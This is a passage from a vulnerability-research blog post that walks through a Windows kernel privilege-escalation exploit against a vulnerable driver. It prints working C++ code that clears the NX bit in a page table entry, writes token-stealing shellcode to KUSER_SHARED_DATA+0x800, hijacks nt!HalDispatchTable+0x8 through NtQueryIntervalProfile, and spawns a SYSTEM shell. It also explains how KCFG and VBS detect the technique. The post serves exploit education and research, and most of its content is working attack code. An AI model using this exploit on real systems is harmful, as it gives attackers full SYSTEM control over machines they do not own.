Next, a few bitwise operations taken from the nt!MiGetPteAddress function shown above calculate the PTE address of the given address, which is then returned.
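
The arithmetic itself can be checked without a kernel. In the sketch below, `PteAddress` mirrors the three operations from ReadPTE(), and `PteAddressExplicit` is a hypothetical second form that spells out what they mean: take the 36-bit virtual page number (bits 47..12) and multiply it by the 8-byte PTE size. The PTE base 0xFFFFC68000000000 is not printed anywhere in this article; it is inferred by subtracting the computed index from the PTE address 0xFFFFC6FBC0000000 observed in the run further on, so treat it as an assumption.

```cpp
#include <cassert>
#include <cstdint>

// Same three steps as ReadPTE(): shift, mask, add the PTE base.
constexpr std::uint64_t PteAddress(std::uint64_t virtualAddress, std::uint64_t pteBase) {
    return ((virtualAddress >> 9) & 0x7FFFFFFFF8ull) + pteBase;
}

// Equivalent form: virtual page number (bits 47..12) times 8 bytes per PTE.
constexpr std::uint64_t PteAddressExplicit(std::uint64_t virtualAddress, std::uint64_t pteBase) {
    return ((virtualAddress >> 12) & 0xFFFFFFFFFull) * 8 + pteBase;
}

inline void CheckPteArithmetic() {
    const std::uint64_t codeCave = 0xFFFFF78000000800ull;  // KUSER_SHARED_DATA+0x800
    const std::uint64_t pteBase  = 0xFFFFC68000000000ull;  // inferred, see the note above
    assert(PteAddress(codeCave, pteBase) == 0xFFFFC6FBC0000000ull);
    assert(PteAddressExplicit(codeCave, pteBase) == PteAddress(codeCave, pteBase));
    // Every address inside the same 4 KB page maps to the same PTE.
    assert(PteAddress(0xFFFFF78000000000ull, pteBase) == PteAddress(codeCave, pteBase));
}
```

The shift by 9 is simply a shift by 12 followed by a multiplication by 8, and the mask clears both the sign-extension bits and the low 3 bits so the result is aligned to a PTE.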

Let’s view the next phase of the main() function:

  
    /*
    When _ETHREAD.PreviousMode field is overwritten, the kernel sees this thread as a "Kernel Thread"
    in read/write operations. This means that both reading and writing is available on kernel space;
    */
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4); // Opening a handle to SYSTEM (4) process
    if (hProcess == NULL) // OpenProcess() returns NULL on failure, not INVALID_HANDLE_VALUE
    {
        printf("[-] Error opening handle to SYSTEM... GetLastError(): %u\n", GetLastError());
        return -1;
    }
    ULONG_PTR PTEAddress = (ULONG_PTR)ReadPTE(hProcess, shellcode_address);
    printf("[+] KUSER_SHARED_DATA+0x800 `PTE` address: 0x%p\n", PTEAddress);

    // Reading retrieved `PTE` Address' permission set
    ULONG_PTR PtePermissionSet = 0;
    status = NtReadVirtualMemory(hProcess, (PVOID)PTEAddress, (PVOID)&PtePermissionSet, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in reading KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }
    printf("[*] KUSER_SHARED_DATA+0x800 `PTE` Permission set: %p\n", PtePermissionSet);

The main() function continues by opening a handle to the SYSTEM process and calling ReadPTE(), with the first argument being the SYSTEM process handle and the second argument being the address where our shellcode is going to reside. It then executes NtReadVirtualMemory() to read the PTE permissions data.

Let’s execute the code:

We can see that we’ve successfully read the PTE address of our shellcode page, which is 0xFFFFC6FBC0000000. Let’s confirm its validity in WinDbg:

  
dt nt!_MMPTE_HARDWARE 0xFFFFC6FBC0000000 

Viewing the “_MMPTE_HARDWARE” structure with the target PTE set, we can understand that the target page is:

Readable
Writable
Not Executable

With this permission set in the PTE, if we write the shellcode and attempt to execute it, we’ll receive a Blue Screen, because we’d be executing code in a non-executable page.

With that understanding, we know that the next step is to flip the PTE’s “NoExecute” bit to 0, which makes the target page executable. We’re going to do that by XORing the PTE value (which is currently 0x8000000004A27963) with 0x8000000000000000: the leading “8” is bit 63, the “NX” (NoExecute) bit, so XORing the 2 values clears it. To reflect it in the kernel, we’re going to write the modified value to the PTE using NtWriteVirtualMemory().

All of these actions are happening in the main() function in the following way:

  
    PtePermissionSet ^= 0x8000000000000000; // Removing NX bit from PTE...
    printf("[*] KUSER_SHARED_DATA+0x800 Modified `PTE` Permissions set: %p\n", PtePermissionSet);

    status = NtWriteVirtualMemory(hProcess, (PVOID)PTEAddress, &PtePermissionSet, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in writing KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }
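
One detail about the XOR is worth spelling out: it toggles the bit rather than clearing it, so running the exploit a second time against an already patched PTE would set NX again. The sketch below, with hypothetical helper names, contrasts the toggle with an AND-NOT that clears the bit regardless of its current state, using the PTE value from this article.

```cpp
#include <cassert>
#include <cstdint>

// Bit 63 of an x64 PTE is the NoExecute (NX) bit.
constexpr std::uint64_t kNoExecuteBit = 1ull << 63;

// What the XOR does: flips NX whatever its current state is.
constexpr std::uint64_t ToggleNx(std::uint64_t pte) {
    return pte ^ kNoExecuteBit;
}

// Idempotent alternative: clears NX and leaves an executable PTE unchanged.
constexpr std::uint64_t ClearNx(std::uint64_t pte) {
    return pte & ~kNoExecuteBit;
}

constexpr bool IsExecutable(std::uint64_t pte) {
    return (pte & kNoExecuteBit) == 0;
}

inline void CheckNxHandling() {
    const std::uint64_t original = 0x8000000004A27963ull;  // PTE value read above
    assert(!IsExecutable(original));
    assert(ToggleNx(original) == 0x0000000004A27963ull);
    assert(ClearNx(original) == 0x0000000004A27963ull);
    // Applying each operation a second time shows the difference.
    assert(ToggleNx(ToggleNx(original)) == original);            // NX is back
    assert(ClearNx(ClearNx(original)) == 0x0000000004A27963ull); // still executable
}
```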

Let’s now execute the program once again and see the NX bit being removed from our target PTE:

Let’s verify it in WinDbg:

  
dt nt!_MMPTE_HARDWARE 0xFFFFC6FBC0000000

As we can see, we successfully overwrote the PTE and made the target page where our shellcode will reside also executable.

Now, the next thing we’re going to do is write the shellcode to “KUSER_SHARED_DATA+0x800”. This is the “Token Stealing” shellcode, and the offsets within it are specific to the Windows 10 build I’m demonstrating with:

  
    /*
    *shellcode itself*
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\x48\x04\x00\x00"                      # mov rbx,[rbx+0x448] ; ActiveProcessLinks
    "\x48\x81\xEB\x48\x04\x00\x00"                      # sub rbx,0x448       ; Go back to current process
    "\x48\x8B\x8B\x40\x04\x00\x00"                      # mov rcx,[rbx+0x440] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\xB8\x04\x00\x00"                      # mov rcx,[rbx+0x4B8] ; SYSTEM token is @ offset _EPROCESS + 0x4B8
    "\x48\x89\x88\xB8\x04\x00\x00"                      # mov [rax+0x4B8],rcx ; Copy SYSTEM token to current process
    "\xC3"                                              # ret                 ; Done!
    */

    char payload[] =
        "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"//              # mov rax, [gs:0x188]; Current thread(KTHREAD)
        "\x48\x8B\x80\xB8\x00\x00\x00"        //              # mov rax, [rax + 0xb8]; Current process(EPROCESS)
        "\x48\x89\xC3"                        //              # mov rbx, rax; Copy current process to rbx
        "\x48\x8B\x9B\x48\x04\x00\x00"        //              # mov rbx, [rbx + 0x448]; ActiveProcessLinks
        "\x48\x81\xEB\x48\x04\x00\x00"        //              # sub rbx, 0x448; Go back to current process
        "\x48\x8B\x8B\x40\x04\x00\x00"        //              # mov rcx, [rbx + 0x440]; UniqueProcessId(PID)
        "\x48\x83\xF9\x04"                    //              # cmp rcx, byte + 0x4; Compare PID to SYSTEM PID
        "\x75\xE5"                            //              # jnz 0x13; Loop until SYSTEM PID is found
        "\x48\x8B\x8B\xB8\x04\x00\x00"        //              # mov rcx, [rbx + 0x4B8]; SYSTEM token is @ offset _EPROCESS + 0x4B8
        "\x48\x89\x88\xB8\x04\x00\x00"        //              # mov[rax + 0x4B8], rcx; Copy SYSTEM token to current process
        "\xC3";

    printf("\n");

The shellcode parses the “KPCR” to get our process’ _EPROCESS structure, iterates over the linked list of all the _EPROCESS structures on the system through a field called “ActiveProcessLinks”, finds the _EPROCESS address of the SYSTEM process, and copies the SYSTEM process token to our local process, giving our process SYSTEM permissions.
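
Hand-assembled shellcode is easy to get subtly wrong, so it helps to check the encoded operands against the comments. The sketch below copies the payload bytes from above (without the string’s trailing NUL) and decodes three things: the target of the short `jnz`, the two ActiveProcessLinks displacements, and the two Token displacements. The helper names and the instruction offsets listed in the comments are my own bookkeeping, not something produced by a disassembler.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Payload bytes from the article.
const unsigned char kPayload[] = {
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,  // +0:  mov rax,[gs:0x188]
    0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,              // +9:  mov rax,[rax+0xb8]
    0x48, 0x89, 0xC3,                                      // +16: mov rbx,rax
    0x48, 0x8B, 0x9B, 0x48, 0x04, 0x00, 0x00,              // +19: mov rbx,[rbx+0x448]
    0x48, 0x81, 0xEB, 0x48, 0x04, 0x00, 0x00,              // +26: sub rbx,0x448
    0x48, 0x8B, 0x8B, 0x40, 0x04, 0x00, 0x00,              // +33: mov rcx,[rbx+0x440]
    0x48, 0x83, 0xF9, 0x04,                                // +40: cmp rcx,4
    0x75, 0xE5,                                            // +44: jnz (rel8)
    0x48, 0x8B, 0x8B, 0xB8, 0x04, 0x00, 0x00,              // +46: mov rcx,[rbx+0x4b8]
    0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,              // +53: mov [rax+0x4b8],rcx
    0xC3                                                   // +60: ret
};
static_assert(sizeof(kPayload) == 61, "payload length without the trailing NUL");

// Reads a little-endian 32-bit operand.
inline std::uint32_t ReadU32LE(const unsigned char* p) {
    return static_cast<std::uint32_t>(p[0]) | (static_cast<std::uint32_t>(p[1]) << 8) |
           (static_cast<std::uint32_t>(p[2]) << 16) | (static_cast<std::uint32_t>(p[3]) << 24);
}

// Target of a short conditional jump: end of the 2-byte instruction plus signed rel8.
inline int ShortJumpTarget(const unsigned char* code, std::size_t jumpOffset) {
    assert(code[jumpOffset] == 0x75);  // opcode of the short jnz
    const int rel8 = static_cast<std::int8_t>(code[jumpOffset + 1]);
    return static_cast<int>(jumpOffset) + 2 + rel8;
}
```

`ShortJumpTarget(kPayload, 44)` evaluates to 0x13, the offset of `mov rbx,[rbx+0x448]`, which matches the `jnz 0x13` comment. Reading the operands at offsets 22 and 29 confirms that the list walk adds and subtracts the same 0x448.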

We’re going to write it through the following code in the main() function:

  
    // Writing shellcode
    printf("[*] Writing Token Stealing shellcode...\n");
    status = NtWriteVirtualMemory(hProcess, (PVOID)shellcode_address, (PVOID)&payload, sizeof(payload), nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error writing shellcode into KUSER_SHARED_DATA+0x800 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

Let’s execute the program and validate that the shellcode was successfully written to KUSER_SHARED_DATA+0x800:

uf 0xfffff78000000800

As we can see, the “Token Stealing” shellcode was successfully written to our code cave.

The next thing is to find a way to trigger our shellcode. We’re going to do that by overwriting nt!HalDispatchTable+0x8 with our shellcode address and calling the “NtQueryIntervalProfile()” function from our client program. The “HAL” (Hardware Abstraction Layer) is a low-level layer that provides a uniform set of functions through which the operating system interacts with hardware components. We’re going to temporarily overwrite a function pointer within nt!HalDispatchTable with the shellcode address, and invoke it using “NtQueryIntervalProfile()”. After it has been executed, we’ll restore the original function pointer.

This is how it’s performed in the main() function:

  
    ULONG_PTR HalDispatchTable = g_BaseAddress + 0xc00a60;
    printf("[+] nt!HalDispatchTable base address: 0x%p\n", HalDispatchTable);

    ULONG_PTR OriginalNtQueryIntervalProfileAddress;
    status = NtReadVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable + 0x8), &OriginalNtQueryIntervalProfileAddress, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error reading original HalDispatchTable+0x8 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

    printf("[*] Original nt!HalDispatchTable+0x8 address: 0x%p\n", OriginalNtQueryIntervalProfileAddress);
    printf("[+] Press Enter to overwrite nt!HalDispatchTable+0x8...");
    getchar();

    status = NtWriteVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable+0x8), (PVOID)&shellcode_address, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error overwriting nt!HalDispatchTable+0x8 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

    printf("[+] nt!HalDispatchTable+0x8 was overwritten successfully!...\n");
 
    ULONG Interval = 0;
    status = NtQueryIntervalProfile(0x1234, &Interval); //Invoke the shellcode execution
    if(!NT_SUCCESS(status))
    {
        printf("[-] Error executing NtQueryIntervalProfile() - NTSTATUS 0x%x\n", status);
        return status;
    }
    
    printf("[+] Shellcode Executed - Current process token was overwritten with SYSTEM token!\n");
    
    // Returning original address in nt!HalDispatchTable+0x8
    status = NtWriteVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable + 0x8), (PVOID)&OriginalNtQueryIntervalProfileAddress, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in returning original address in nt!HalDispatchTable+0x8 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

First, we get the offset to the nt!HalDispatchTable, which is different between OS versions. Next, we read the original function pointer value from nt!HalDispatchTable+0x8, so we can restore it after the shellcode is executed.

After having the original function pointer, we overwrite it with the shellcode address using NtWriteVirtualMemory().

Now, to invoke the shellcode, we’re going to execute NtQueryIntervalProfile(), which would normally end up calling the original function pointer, nt!HaliQuerySystemInformation, but now calls our shellcode. After invoking the shellcode, we’ll execute NtWriteVirtualMemory() once again to restore nt!HaliQuerySystemInformation at nt!HalDispatchTable+0x8.
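
Note that in the code above, the error path after NtQueryIntervalProfile() returns before the original pointer is written back. One way to make the restore unconditional is a small scope guard. The sketch below is a user-mode illustration only: `ScopedSlotPatch` is a hypothetical class that operates on an ordinary variable, whereas in the real exploit the read and the two writes would go through NtReadVirtualMemory() and NtWriteVirtualMemory().

```cpp
#include <cassert>
#include <cstdint>

// Overwrites one pointer-sized slot and puts the original value back when the
// guard goes out of scope, including on early-return paths.
class ScopedSlotPatch {
public:
    ScopedSlotPatch(std::uint64_t* slot, std::uint64_t replacement)
        : slot_(slot), original_(0) {
        assert(slot_ != nullptr);
        original_ = *slot_;    // remember the original pointer first
        *slot_ = replacement;  // then install the temporary one
    }

    ~ScopedSlotPatch() { *slot_ = original_; }  // always restore

    ScopedSlotPatch(const ScopedSlotPatch&) = delete;
    ScopedSlotPatch& operator=(const ScopedSlotPatch&) = delete;

    std::uint64_t original() const { return original_; }

private:
    std::uint64_t* slot_;
    std::uint64_t original_;
};

// Simulates "patch, trigger, restore" on a fake two-entry dispatch table.
// Returns the value that was in the slot while the patch was active.
inline std::uint64_t PatchTriggerRestore(std::uint64_t* table, std::uint64_t shellcodeAddress) {
    ScopedSlotPatch patch(&table[1], shellcodeAddress);  // table[1] plays the role of +0x8
    return table[1];  // a real exploit would call NtQueryIntervalProfile() here
}
```

Keeping the table patched for as short a time as possible matters, since any other caller of that pointer would also land in the shellcode while the patch is in place.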

Let’s execute the exploit:

Viewing the nt!HalDispatchTable+0x8 before modification:

  
dps nt!HalDispatchTable L2

Let’s continue execution:

Now, after the shellcode was executed, let’s validate that the SYSTEM token was successfully copied to our current process:

The first value is the SYSTEM process token address, and the second value is our local process token address. This confirms that the token was copied successfully and now we’re a privileged process.

The only thing left to do is to spawn a shell. Since PreviousMode is overwritten on our current thread, calling system("cmd.exe") directly from it would be problematic, so we create a separate thread that executes the command:

  
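    printf("Press Enter to get a SYSTEM shell...\n");
    getchar();

    // Run system("cmd.exe") on a new thread, whose PreviousMode we did not tamper with
    DWORD ThreadID = 0;
    char command[] = "cmd.exe";
    HANDLE hThread = CreateThread(nullptr, 1024, (LPTHREAD_START_ROUTINE)system, command, 0, &ThreadID);
    if (hThread == nullptr)
    {
        printf("[-] Error creating the shell thread - Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return -1;
    }

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    
    return 0;
}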

Let’s now receive a shell…

Let’s summarize what we did:

We reversed and analyzed different IOCTLs in the driver in an attempt to find vulnerabilities.
We found 2 potential vulnerabilities: one that should allow us to exploit arbitrary memory mapping and overwrite our token with the SYSTEM token, and another that grants us an “Arbitrary Write” primitive.
We ran into a problem while attempting to exploit the memory mapping vulnerability, so we moved on to the “Arbitrary Write” primitive.
We exploited the “Arbitrary Write” primitive in 2 ways:
- By obtaining the SYSTEM process token address and our local process token address, and directly overwriting our token with the SYSTEM process token.
- By overwriting PreviousMode of our current thread, modifying the code cave’s Page Table Entry to make it executable, writing our shellcode into the code cave, and executing the shellcode by overwriting “nt!HalDispatchTable+0x8” with the shellcode address.

Note that the second exploitation method will be detected by KCFG (Kernel Control Flow Guard) and by VBS (Virtualization Based Security) through SLAT (Second Level Address Translation). Here is why.

KCFG detects the second exploitation method because the call through the overwritten nt!HalDispatchTable+0x8 pointer is an indirect function call, and KCFG validates the target of indirect calls. Our shellcode address inside the code cave is not registered as a valid call target, so the check fails and the system crashes.
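The idea behind the check can be sketched with a simplified model. This is an assumption-laden illustration, not how KCFG is implemented: the real mechanism consults a bitmap describing valid call targets, while this sketch uses a std::set, and GuardModel, GuardedCall and the addresses used with them are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <set>

using Target = std::uintptr_t;

// Simplified model: the set of addresses that are legitimate indirect call targets.
struct GuardModel
{
    std::set<Target> validTargets;

    bool IsValidCallTarget(Target t) const
    {
        return validTargets.count(t) != 0;
    }
};

// Models a guarded indirect call: returns true if the call would be allowed,
// false if the guard would reject it (where the real system would bugcheck).
inline bool GuardedCall(const GuardModel& guard, Target target)
{
    return guard.IsValidCallTarget(target);
}
```

In this model, the original handler's address would be in validTargets, while an address in the middle of a code cave would not, so redirecting the pointer there is rejected.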

VBS detects it through SLAT because we attempt to execute code in a page that was not originally executable. The first address translation, inside the kernel, succeeds because we changed the PTE to be executable. The second translation, performed by the hypervisor at ring -1, still marks the page as non-executable, so the malicious PTE modification is caught and the system crashes.
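The two-stage permission check can be modeled in a few lines. This is a simplified sketch that assumes an Intel platform, where the second stage uses EPT entries; it only looks at the execute permission and ignores every other bit. The function names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kPteNoExecute = 1ULL << 63;  // NX bit of an x64 page table entry
constexpr std::uint64_t kEptExecute   = 1ULL << 2;   // execute-access bit of an Intel EPT entry

// Stage 1: the guest (kernel) page tables, which the exploit is able to modify.
constexpr bool GuestAllowsExecute(std::uint64_t guestPte)
{
    return (guestPte & kPteNoExecute) == 0;
}

// Stage 2: the hypervisor's tables, which the guest kernel cannot modify.
constexpr bool HypervisorAllowsExecute(std::uint64_t eptEntry)
{
    return (eptEntry & kEptExecute) != 0;
}

// Code runs only if both stages grant execute permission.
constexpr bool CanExecute(std::uint64_t guestPte, std::uint64_t eptEntry)
{
    return GuestAllowsExecute(guestPte) && HypervisorAllowsExecute(eptEntry);
}

// Clearing NX in the guest PTE is not enough if the EPT entry lacks execute access.
static_assert(!CanExecute(0x0, 0x3), "guest says executable, hypervisor says no");
```

Clearing the NX bit only changes the outcome of the first stage, which is why the PTE modification works without VBS but fails once the hypervisor enforces its own view of the page.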

If you’re not familiar with these modern kernel exploitation protection mechanisms, I highly recommend reading about them in books like “Windows Internals 2nd Edition” and “Intel 64 and IA-32 Architectures Software Developer Manuals”.

The exploit code we wrote is fully available on my GitHub page:

https://github.com/AmitMoshel1/gdrv_sys_exploit/

Vulnerability-Research

This post is licensed under CC BY 4.0 by the author.
